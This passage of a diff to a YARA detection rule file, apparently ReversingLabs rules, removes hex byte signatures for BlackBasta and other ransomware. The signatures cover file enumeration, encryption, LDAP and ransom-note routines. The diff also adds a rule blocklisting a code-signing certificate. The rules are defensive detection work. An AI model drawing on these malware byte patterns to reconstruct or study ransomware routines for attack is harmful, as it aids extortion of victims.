-            66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ??
-            8D 75 ?? 0F 43 F7 83 F8 ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75
-            ?? 83 C1 ?? 83 EA ?? 75 ?? E9 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 75 ?? 0F 43 F7 83 F8
-            ?? 75 ?? B9 ?? ?? ?? ?? 8B D0 2B F1 66 8B 04 0E 66 3B 01 75 ?? 83 C1 ?? 83 EA ?? 75
-            ?? EB ?? 83 7D ?? ?? 75 ?? 8B 55 ?? 8D 45 ?? 8B 4D ?? 83 FA ?? 0F 43 C1 66 83 38 ??
-            75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66
-            83 78 ?? ?? 75 ?? 83 FA ?? 8D 45 ?? 0F 43 C1 66 83 78 ?? ?? 74 ?? 8B 8D ?? ?? ?? ??
-            8D 45 ?? 50 E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? C6 45 ?? ?? 83 FB ?? 72 ?? 8D 0C 5D ??
-            ?? ?? ?? 8B C7 81 F9 ?? ?? ?? ?? 72 ?? 8B 7F ?? 83 C1 ?? 2B C7 83 C0 ?? 83 F8 ?? 0F
-            87 ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B
-            9D ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B
-            C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ??
-            ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 88 45 ?? 8B 55 ?? C7 45
-            ?? ?? ?? ?? ?? 66 89 45 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA
-            ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15
-        }
-		$enum_resources = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B DA 89 5D ?? 8D 45 ?? C7 45 ?? ?? ??
-            ?? ?? 50 51 6A ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 32
-            C0 E9 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 85 F6 74 ?? 66 90
-            FF 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF 75 ?? FF 15
-            ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 FF 39 7D ?? 76 ?? 83 C6 ?? 83 7E ?? ?? 0F 85
-            ?? ?? ?? ?? 83 3E ?? 0F 85 ?? ?? ?? ?? 8B 56 ?? 33 C0 66 89 45 ?? 8B C2 C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 58 ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C3 8D 4D
-            ?? D1 F8 50 52 E8 ?? ?? ?? ?? 8B 5D ?? 8D 45 ?? 50 8B CB C7 45 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ??
-            8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51
-            E8 ?? ?? ?? ?? 83 C4 ?? F7 46 ?? ?? ?? ?? ?? 74 ?? 8D 4E ?? 8B D3 E8 ?? ?? ?? ?? 47
-            83 C6 ?? 3B 7D ?? 0F 82 ?? ?? ?? ?? 8B 75 ?? E9 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 8B 7D ?? 0F 57 C0 66 0F 13 45 ??
-            C7 45 ?? ?? ?? ?? ?? 8B C7 83 7F ?? ?? 72 ?? 8B 07 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
-            6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 75 ?? FF 15 ?? ??
-            ?? ?? 32 DB E9 ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74
-            ?? 8D 8E ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8D 8E ?? ?? ?? ?? 6A ?? 8D
-            41 ?? 50 6A ?? 8D 56 ?? 51 52 89 55 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 53 FF 15
-            ?? ?? ?? ?? 8B 4D ?? 8B 45 ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 8D 45 ?? 8B CE
-            50 E8 ?? ?? ?? ?? EB ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 77 ?? 6A ?? EB ?? 6A ?? 8D
-            45 ?? 8B CE 50 E8 ?? ?? ?? ?? 8B 75 ?? 8A D8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 83
-            CE ?? 89 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D7 8D 4D ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 83 7F ?? ?? 72 ?? 8B 3F 50 57 FF 15 ?? ??
-            ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ??
-            72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ??
-            33 C0 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 83 FE ?? 74 ?? 56 FF 15
-            ?? ?? ?? ?? 8A C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ??
-            ?? ?? 8B E5 5D C2 ?? ?? E8 ?? ?? ?? ?? CC CC CC 55 8B EC 83 E4 ?? 81 EC
-        }
-		$encrypt_files_p2 = {
-            A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B 5D ?? 56 57 8B F9 89 5C 24 ?? 6A ??
-            8D 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 51 8B 17 8B 47 ?? 2B C2 50 52 FF 33 FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? FF 15 ?? ?? ?? ?? 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33
-            CC E8 ?? ?? ?? ?? 8B E5 5D C2 ?? ?? 8B 44 24 ?? 8B 57 ?? 8B 0F 89 44 24 ?? 89 54 24
-            ?? 89 4C 24 ?? 85 C0 7E ?? 8B D8 8B 47 ?? 8B F3 2B 47 ?? 3B D8 52 0F 43 F0 8D 47 ??
-            56 51 50 E8 ?? ?? ?? ?? 56 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 2B DE
-            8B 54 24 ?? 03 CE 83 C4 ?? 89 4C 24 ?? 85 DB 7F ?? 8B 5C 24 ?? 6A ?? 6A ?? 0F 57 C0
-            66 0F 13 44 24 ?? FF 74 24 ?? FF 74 24 ?? FF 33 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
-            85 C0 75 ?? FF D6 89 43 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 8D 4C 24 ?? 89 44 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 89 44 24 ?? A1 ?? ?? ?? ??
-            89 44 24 ?? 8D 87 ?? ?? ?? ?? 50 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 4C 24 ?? ?? 8D 44 24 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 50 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 89 43 ?? 6A ?? 8D 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF 37 FF 33 FF 15 ?? ?? ?? ?? 85 C0 75 ??
-            FF D6 89 43 ?? 32 C0 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
-            ?? ?? 8B 8C 24 ?? ?? ?? ?? B0 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $enum_resources ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "55:7b:0a:bf:44:04:58:27:f1:f3:6e:fb:c9:62:71:ec" and 1480291200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Blackbasta : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_7903870184E18A80899740845A15E2B2 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects BlackBasta ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7c451fde-b8b1-5a35-855e-7e30f3e75cbb"
-		date = "2022-12-13"
-		modified = "2022-12-13"
+		id = "a55bed5b-906f-5c9d-bddd-b4d53d6351de"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.BlackBasta.yara#L1-L531"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c68671e51489af00e9e0cf28373e5ec01bda042653dbcca8843357eede41f27f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L15846-L15862"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ad32491b463d0b3b4c85ed78e81bb69802e5f90ae835f73e270b28f02b36f840"
 		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		quality = 90
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "BlackBasta"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B F0 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C6
-            E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85 ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88
-            9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75
-            ?? 8A 48 ?? 84 C9 74 ?? 80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15
-        }
-		$encrypt_files_v1 = {
-            6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F
-            ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A
-            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 FF B5 ?? ?? ?? ?? 57 53 56 83 EC ?? 8B F4 89 A5
-            ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ??
-            ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A
-            ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45
-            ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 80 BD ?? ?? ?? ?? ??
-            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-        }
-		$cmd_prompt = {
-            8B FF 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? FC 53 56 8B 75 ?? 8D 45 ?? 33 DB
-            68 ?? ?? ?? ?? 53 50 89 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 0F 84 ??
-            ?? ?? ?? 85 F6 75 ?? 53 39 5D ?? 75 ?? E8 ?? ?? ?? ?? 59 33 C0 E9 ?? ?? ?? ?? FF 75
-            ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 85 F6 0F 94 C0 E9 ??
-            ?? ?? ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 89 75 ?? 89 5D ?? 57 85 C0 74 ?? E8
-            ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 53 89 18 8D 45 ?? 50 FF 75 ?? 53 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B F0 E8 ?? ?? ?? ?? 83 FE ?? 74 ?? 89 38 EB ?? 83 38 ?? 74 ?? E8 ?? ?? ?? ??
-            83 38 ?? 74 ?? 83 CE ?? FF 75 ?? E8 ?? ?? ?? ?? 59 EB ?? E8 ?? ?? ?? ?? 89 38 53 8D
-            45 ?? B9 ?? ?? ?? ?? 50 51 53 89 4D ?? E8 ?? ?? ?? ?? FF 75 ?? 8B F0 E8 ?? ?? ?? ??
-            83 C4 ?? 8B C6 5F 8B 4D ?? 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 53
-        }
-		$ldap_connect = {
-            C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ??
-            50 6A ?? 53 8B 35 ?? ?? ?? ?? FF D6 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 53 FF D6
-            6A ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ??
-            85 C0 74 ?? 6A ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
-            6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 C4 ??
-            8B F0 89 75 ?? 8D 45 ?? 50 8D 45 ?? 50 6A ?? 6A ?? 56 53 FF 15 ?? ?? ?? ?? 83 C4 ??
-            85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? 53 FF 15 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 0F 84 ??
-            ?? ?? ?? FF 75 ?? 57 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 8B
-            06 85 C0 0F 84 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 50 8B 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? FF 36 68 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 8B C8 89 4D ?? 8B 01 8B 40 ?? C6 45 ?? ?? 8B 44 08 ?? 8B 58 ?? 89 5D
-            ?? 8B 03 8B CB FF 50 ?? 83 4D ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 10 6A ??
-            8B C8 FF 52 ?? 0F B7 C0 89 45 ?? 83 65 ?? ?? C6 45 ?? ?? 85 DB 74 ?? 8B 03 8B CB FF
-            50 ?? 8B C8 85 C9 74 ?? 8B 01 6A ?? FF 10 8B 45 ?? 50 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D
-            ?? E8 ?? ?? ?? ?? 8B 5D ?? 56 FF 15
-        }
-		$encrypt_files_v2 = {
-            8D 45 ?? 50 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 FF 75 ?? 83 EC ?? 8B
-            F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? 89 45 ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF 75
-            ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8
-            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-        }
-		$encrypt_files_v3 = {
-            6A ?? E8 ?? ?? ?? ?? 8B F8 89 BD ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F0 89 B5 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 57 E8 ?? ?? ?? ?? 6A ?? 57 56 E8 ?? ?? ?? ?? 8D 4F
-            ?? 6A ?? 51 53 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A
-            ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 6A ?? 57 53 56 83 EC ?? 8B F4 89 A5 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D ?? E8 ?? ?? ?? ?? C6
-            45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 85 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? FF B5 ??
-            ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 57 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45
-            ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$encrypt_files_v4 = {
-            8D 45 ?? 50 E8 ?? ?? ?? ?? 0F 10 45 ?? 0F 11 45 ?? 0F 10 45 ?? 0F 11 45 ?? 8B 45 ??
-            8B 4D ?? 89 45 ?? 89 4D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ??
-            8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 56 57 8D 45 ?? 50 8D 45 ?? 50 83 EC ?? 8B
-            F4 89 A5 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 6A ?? 56 8D 4D
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 6A ?? FF B5 ?? ?? ?? ?? 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8D 85
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? EB ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? C6 45 ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? C6 45 ?? ?? 8B 8D ?? ?? ?? ?? 83 F9 ?? 72 ?? 8D 0C 4D ?? ?? ?? ?? 89 8D ?? ??
-            ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 8B
-            50 ?? 2B C2 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 85
-            ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 33 C0 66 89 85 ?? ?? FF FF C6
-            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8
-        }
-		$drop_ransom_note_v1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 03 00 00 A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? ?? ?? ?? ?? 45 FC 00 00 00 00
-            6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 83
-            BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
-            BD ?? ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
-            8D 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ??
-            50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
-            5D C3
-        }
-		$exclude_from_encryption_v1 = {
-            83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D
-            ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8
-            ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B
-            F0 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 FE ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
